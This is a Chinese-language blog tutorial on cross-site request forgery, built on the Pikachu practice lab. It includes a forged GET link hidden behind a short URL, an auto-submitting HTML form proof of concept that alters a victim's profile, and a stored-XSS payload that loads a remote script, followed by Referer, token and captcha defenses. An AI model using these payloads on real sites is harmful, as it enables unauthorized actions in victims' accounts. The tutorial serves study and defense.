CSRF漏洞详解

已于 2024-03-07 18:50:29 修改
阅读量802 收藏 22
点赞数 14
分类专栏: Web 文章标签: csrf 安全 笔记
于 2024-02-21 14:23:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64481831/article/details/136195033
版权

目录

CSRF原理

CSRF、SSRF与XSS的区别

判断是否存在CSRF

CSRF攻击示例

GET型的CSRF

POST型的CSRF

CSRF+XSS的组合利用

CSRF如何防御

验证HTTP Referer字段

添加token,并验证

关键请求添加验证码

CSRF原理

CSRF(跨站请求攻击)的形成原因,简单来说,就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造的csrf脚本或链接,可以执行一些非用户本意的操作(比如更改密码,甚至转账等)。

攻击流程图

这里的恶意网站B更改为csrf脚本或链接(懒得再画图)

CSRF、SSRF与XSS的区别

XSS可以理解为攻击者窃取用户的身份信息进行操作

CSRF可以理解为攻击者没有窃取用户身份信息但是它通过其他手段获取了你的一次性身份信息的利用进行操作

SSRF可以理解为攻击者利用服务器的不严谨的过滤限制,将服务器当作跳板利用进行操作

判断是否存在CSRF

对一些增删改查,购买之类的操作,可以抓包看看逻辑,是否不需要或者可以绕过验证用户身份

比如:

  • 修改密码,不需要验证旧密码
  • 增删改查不需要验证Cookie
  • 虽然退出或关闭了浏览器,但Cookie仍然有效,或者Session没有及时过期
  • 去掉Referer字段看是否有变化,没有变化意味着Referer服务器端并未验证;以及查看一下是否有CSRF token

CSRF攻击示例

GET型的CSRF

有一个网站A,修改个人信息,抓包,发现数据包信息

GET /pikachu/vul/csrfget/csrf_get_edit.php?sex=boy&phonenum=11111&add=nba+76&email=123@qq.com&sumbit=submit HTTP/1.1

发现要修改的信息都在URL的参数里面,并不需要进行身份验证

那可以构造一个恶意的URL链接:

http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=123456789&add=666&email=hacker@qq.com&submit=submit

当然这太明显,可以把它写成一个短链接(短链接生成平台)

http://g0p.cc/6n6jtL

只要受害者点击,就会触发。

POST型的CSRF

网站B修改信息的数据包

GET /pikachu/vul/csrfget/csrf_get_edit.php HTTP/1.1
......

sex=boy&phonenum=11111&add=nba+76&email=123@qq.com&sumbit=submit

参数的提交采用POST类型,可以利用BurpSuite的自带插件(Generate CSRF PoC)来实现制作一个站点,诱惑目标用户点击,进而发送数据包。

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.171.133/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="12345678911" />
    <input id="add" type="text" name="add" value="hacker" />
    <input id="email" type="text" name="email" value="abc@pikachu.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后把链接发给用户,用户只要点击进入这个页面就会触发提交数据包发送请求,直接修改用户的信息。如果攻击者利用JS让用户进行直接的触发,只要打开了响应的页面就会执行这一行为。

CSRF+XSS的组合利用

利用html很不容易让人利用,漏洞触发条件复杂。

利用XSS漏洞来触发CSRF漏洞,可以让这个触发方式变的简单起来。

比如有一个具有存储型XSS漏洞的留言板,创建一个CSRF项目http://localhost/csrf,然后发表评论

</textarea>'''><script src=http://localhost/csrf></script>

当管理员查看留言时就执行了危险代码,执行了请求。

CSRF如何防御

验证HTTP Referer字段

Referer字段是HTTP请求头一部分,记录了HTTP请求的来源地址。当检测到Referer是其他网站的话,则判断有可能是CSRF攻击,拒绝该请求。这是一种同源策略。

添加token,并验证

token是服务器生成的一串随机数,作为客户端进行请求的一个令牌。

在HTTP请求中,会以参数的形式添加一个随机产生的token,并在服务器端建立一个拦截器来验证这个token,假设请求中没有token或者token内容不正确,则判断可能是CSRF攻击,拒绝该请求。

关键请求添加验证码

当进行一些敏感操作,如修改密码、转账等操作,可以通过增加验证手段,比如图形验证码或短信验证码等,来增强安全性。

!!!!!!!!!!!!!!!!.
关注
  • 14
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF漏洞详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证HTTP请求的Referer,还有验证XMLHttpRequests里的自定义header。鉴于种种原因,这三种方法都不是那么完美,各有利弊。在跨站请求伪造(CSRF)攻击里面,攻击者通过用户的浏览器来注入额外的网络请求,来破坏一个网站会话的完整性。而浏览器的安全策略是允许当前页面
CSRF漏洞的靶场实验
09-19
靶场试炼
hucart-含有CSRF漏洞的源码.zip
12-31
hucart-含有CSRF漏洞的源码,亲测真实有效可用,如有侵权,请联系CSDN管理员删除
CSRF 漏洞详解
一个努力学习网安的小牛马
11-13 486
CSRF漏洞详解
CSRF漏洞详解 一文了解CSRF漏洞
闵行小鱼塘
11-11 2409
本篇总结归纳CSRF漏洞
Pikachu靶场之CSRF漏洞详解
m0_46467017的博客
05-16 6949
Pikachu靶场之XSS漏洞详解前言漏洞简述CSRF是什么CSRF攻击原理CSRF攻击防护如何确认一个web系统存在CSRF漏洞第1关 CSRF(get)第2关 CSRF(post)第三关 CSRF Tokentoken验证原理其他防范措施 前言 本篇文章用于巩固对自己csrf漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列) 链接: Pikachu漏洞靶场系列之CSRF 漏洞简述 CSRF是什么 CSRF全称为跨站请求伪造(Cro
csrf漏洞.rar
09-15
常见csrf漏洞解决方案,亲测可用。用于Awvs扫描出来的常见漏洞解决方案。可通过添加前端session值验证
CSRF 攻击实验:无防御措施的 CSRF 漏洞
Flag少侠的博客
05-14 1442
CSRF(Cross-Site Request Forgery),也称为XSRF,是一种安全漏洞,攻击者通过欺骗用户在受信任网站上执行非自愿的操作,以实现未经授权的请求。CSRF攻击利用了网站对用户提交的请求缺乏充分验证和防范的弱点。攻击者通常通过在受信任网站上构造恶意的请求链接或提交表单,然后诱使用户点击该链接或访问包含恶意表单的页面。当用户执行了这些操作时,网站会自动发送请求,包含用户的身份验证信息,而用户并不知情。在这个示例中,攻击者可能在自己的网站上构造一个页面,包含上述代码。
【Java代码审计】CSRF
大河之犬的博客
05-13 459
CSRF(Cross Site Request Forgery,跨站点请求伪造)是目前出现次数比较多的漏洞,该漏洞能够使攻击者盗用被攻击者的身份信息,去执行相关敏感操作。实际上这种方式是攻击者通过一些钓鱼等手段欺骗用户去访问一个自己曾经认证过的网站,然后执行一些操作(如后台管理、发消息、添加关注甚至是转账等行为)简而言之,CSRF 漏洞的工作原理是攻击者盗用了用户的身份,以用户的名义发送恶意请求。一次完整的 CSRF 攻击需要具备以下两个条件。
地埋式可燃气体监测终端,地下燃气管网安全“哨兵”
SUNVUA1028的博客
05-10 331
在现代都市的繁华之下,一条条地下燃气管网承载着城市的生命与活力,但管网老化腐蚀,第三方施工破坏,巡检维修不到位等问题,时刻影响着燃气管网安全运行,甚至威胁人民群众的生命财产安全。在这个快速发展的时代,旭华智能埋地式激光可燃气体监测仪,就像燃气管网卫士,时刻守护燃气管网安全,守护人民生命健康和财产安全,为城市的安全发展贡献力量。除监测可燃气体浓度外,还能监测水浸、温度、压力等多种参数,高度集成一体化设计,节省空间的同时,也提升了设备的实用性和便捷性。旭华智能多年来致力于燃气物联网监测领域,自主研发的。
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 968
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
提高岩土工程安全的关键:锚索测力计的应用
yousino1的博客
05-10 210
通过实时监控数据,工程师能够及时发现锚索力量的异常变化,并迅速采取补强措施,成功避免了一次可能的边坡滑坡,确保了施工安全和道路使用的安全。在众多技术和工具中,锚索测力计的应用在提高岩土工程的安全性方面发挥了不可替代的作用。- 坡面和边坡稳定:在施工或自然斜坡可能出现滑移的情况下,通过预应力锚索将斜坡加固,并使用锚索测力计监控锚索的实时力量,及时调整预应力,以防止坡面滑移。锚索测力计作为岩土工程中一项重要的监测工具,随着技术的不断进步,其应用将更加广泛,对保障工程结构的稳定性和安全性具有重大意义。
针对 % 号 | 引起的 不安全情况
m0_74381444的博客
05-11 952
%%%%%%
2024年建筑施工特种作业人员安全生产知识试题
yibaifentiku的博客
05-11 365
7.根据建设部的有关规定,施工单位新招收的合同制工人,及分配来的实习和代培人员,分别要进行三级安全教育,其中第一级安全教育是指( )。3.( )颁布实施,标志着安全生产成为我国现阶段建筑业工作的重点,安全生产制度被确立为促进我国建筑业发展的一项根本制度。8.《生产安全事故报告和调查处理条例》规定,根据生产安全事故造成的人员伤亡或者直接经济损失,事故分为( )等级。5.根据《建设工程安全生产管理条例》,作业人员进入新的岗位或者新的施工现场前,应当接受( )。答案:1-5:DBCBB 6-10:AABBC。
如何确保您的Token安全:防范常见威胁与最佳实践
fudaihb的博客
05-14 957
Token安全是网络安全领域的一个重要方面,尤其是在现代应用程序中,token常常用于身份验证和会话管理。本文将探讨如何保护token不受常见威胁的侵害,并提供一些最佳实践来增强token的安全性。
运维安全管理系统:“四集中”管理 解决迫切问题
2401_83906209的博客
05-13 301
北京国联易安信息技术有限公司(原北京智恒联盟科技有限公司)简称“国联易安”,成立于2006年,拥有“国联易安”和“智恒联盟”两个品牌,是国内专注于保密与非密领域的分级保护、等级保护、业务连续性安全和大数据安全产品解决方案与相关技术研究开发的领军企业。据统计资料显示,在对网络造成严重损害的案例中,有70%是组织里的内部人员所为。细粒度的命令级授权策略,针对运维人员、服务器、服务器账号、服务器应用、访问时间等多个因素设定细粒度的授权策略,使得运维人员的权限得到很细的划分,从而杜绝了运维人员权限不明晰的问题。
云端安全新纪元:云WAF的崛起
gmqqcsdn的博客
05-13 541
综上所述,云WAF在多个领域具有广泛的应用前景。它能够为企业和个人提供有效的网络安全防护解决方案,降低网络安全风险。然而,在实际应用过程中,云WAF也面临着一些挑战和问题,如如何保证防护效果、如何应对不断变化的攻击手段等。因此,我们需要不断研究和探索新的技术手段和方法,提高云WAF的防护能力和适应性。同时,政府、企业和个人也应加强网络安全意识培养和技术培训,共同营造安全、健康的网络环境。
接口安全设计之防篡改和防重放
记录,交流,共同进步
05-13 764
之所以想跟大家分享怎么做好基础的接口安全,一方面是工作需要,之前这部分的工作是我在负责,所以正好有这部分的经验;二是我之前也接触过很多做后端的同学,对于这一块大部分涉及不深或不太了解,也不知道怎么样做才算相对安全。所以把我的想法写出来,供大家参考和讨论,共同学习和进步。当然了,我分享的也只是我的个人经验,自然有很多的不足之处,也并不是说我后续阐述的一些观点和实现就一定是安全的,大家要加入自己的判断,并且混入一些定制化的东西。
csrf漏洞dvwa
09-13
CSRF(Cross-Site Request Forgery)是一种常见的Web应用程序安全漏洞,导致攻击者利用受害者的身份执行恶意操作。DVWA(Damn Vulnerable Web Application)是一个故意设计的Web应用程序,用于演示各种Web安全漏洞。 在DVWA中,可以找到一些关于CSRF漏洞的练习。要利用CSRF漏洞,攻击者需要诱使受害者访问一个包含恶意请求的网页。当受害者登录到DVWA并点击了这个网页时,他们的操作将被误导到执行攻击者指定的操作,而不是预期的操作。 在DVWA中,可以通过以下步骤来进行CSRF漏洞的测试和练习: 1. 打开DVWA,并确保已登录到应用程序。 2. 导航到"CSRF"页面或相关部分。 3. 查看该页面中的HTML源代码,查找表单或其他用户交互元素。 4. 创建一个包含恶意请求的HTML网页,可以使用类似于`<img>`或`<iframe>`标签来隐藏请求。 5. 在恶意网页中,构造一个针对目标用户的请求(例如更改密码、删除帐户等)。 6. 将恶意网页上传到一个服务器,并确保可以通过URL访问。 7. 诱使受害者点击恶意网页的链接。 8. 如果CSRF漏洞存在,并且受害者已经登录到DVWA,攻击者指定的操作将在受害者不知情的情况下执行。 请注意,演示和测试CSRF漏洞时需要遵守法律和道德规范。仅限于在授权的环境中进行此类活动,并且始终要尊重隐私权和合法性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值